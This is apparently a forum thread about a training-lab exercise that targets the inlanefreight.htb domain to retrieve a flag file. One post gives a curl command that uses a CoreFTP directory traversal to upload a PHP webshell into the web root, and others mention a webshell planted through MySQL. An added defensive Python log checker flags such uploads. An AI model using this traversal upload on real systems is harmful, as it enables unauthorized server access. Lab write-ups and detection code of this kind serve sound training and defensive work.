Attacking Common Services - Easy

( You are targeting the inlanefreight.htb domain. Assess the target server and obtain the contents of the flag.txt file. Submit it as the answer. )

Does anyone know about this topic? I uploaded a webshell to the site, but only two commands work: dir and whoami. Does anyone have any references?


Have you tried the command more?

Thanks for the response. I have already found the answer :)

This one was quite a mess. You see so many opportunities that your head is spinning in every direction. After some time, I decided for myself to use the CoreFTP HTTP server directory traversal vulnerability. Then I started trying to upload wwwolf-php-webshell with curl (overkill):

curl -k -X PUT -H "Host: <IP>" --basic -u <user>:<password> -F 'fileX=@/path/to/wwwolf-php-webshell/webshell.php' 'https://IP/../../../../../..\xampp\htdocs\myshell.php'

After that it's a breeze. Just dir "\flag.txt" on the drive root with the webshell UI.

enjoy
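
A defender's view of the upload described in the post above, as an added example that is not part of the thread: a log check that flags write requests whose path climbs above the served root or drops a script file. The "METHOD PATH STATUS" log layout, the sample lines and the function names are constructed assumptions; CoreFTP's own log format is not shown on this page.

```python
import re
from urllib.parse import unquote

# Constructed log lines in an assumed "METHOD PATH STATUS" layout (not CoreFTP's format).
SAMPLE_LOG = [
    r"PUT /reports/q3.pdf 201",
    r"PUT /../../../../../..\xampp\htdocs\myshell.php 201",
    r"PUT /%252e%252e/%252e%252e%255cxampp%255chtdocs%255cnote.txt 201",
    r"GET /docs/../index.html 200",
    r"PUT /uploads/avatar.php 403",
]
WRITE_METHODS = {"PUT", "POST"}
SCRIPT_EXT = (".php", ".phtml", ".asp", ".aspx", ".jsp")

def decode_fully(path, rounds=3):
    """Percent-decode repeatedly so double-encoded dots and separators surface."""
    for _ in range(rounds):
        path = unquote(path)
    return path

def escapes_root(path):
    """True if '..' segments climb above the served root; both separators split."""
    depth = 0
    for seg in re.split(r"[\\/]+", path):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg not in ("", "."):
            depth += 1
    return False

def classify(line):
    """Return (severity, reasons); severity is None for an unremarkable line."""
    method, raw_path, status = re.fullmatch(r"(\S+) (.+) (\S+)", line).groups()
    path = decode_fully(raw_path)
    write = method in WRITE_METHODS
    reasons = []
    if escapes_root(path):
        reasons.append("root-escape")
    if write and path.lower().endswith(SCRIPT_EXT):
        reasons.append("script-upload")
    if not reasons:
        return None, reasons
    if not status.startswith("2"):
        return "medium", reasons  # request was refused, still worth reviewing
    return ("critical" if write and "root-escape" in reasons else "high"), reasons

for entry in SAMPLE_LOG:
    print(classify(entry), entry)
```

Counting depth instead of matching the string ".." keeps a path such as /docs/../index.html, which never leaves the root, out of the alert queue.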

Would you be able to message me with more details of how you did this? How did you get a webshell to the \xampp\htdocs?


I got the flag with some help from a friend. There are at least two ways to get the flag. One way, the way that I had help with from a friend, does not require a webshell or a php-reverse-shell.

Message me if you need help.

The post that @subrealz made is pretty much on the right track, but I could not figure it out from that post. Honestly, I probably would have never figured out the solution without some help.

John

I managed to get the flag with a webshell that I uploaded via SQL… It was limited and messy but it did the job.


I figured MySQL was the other path.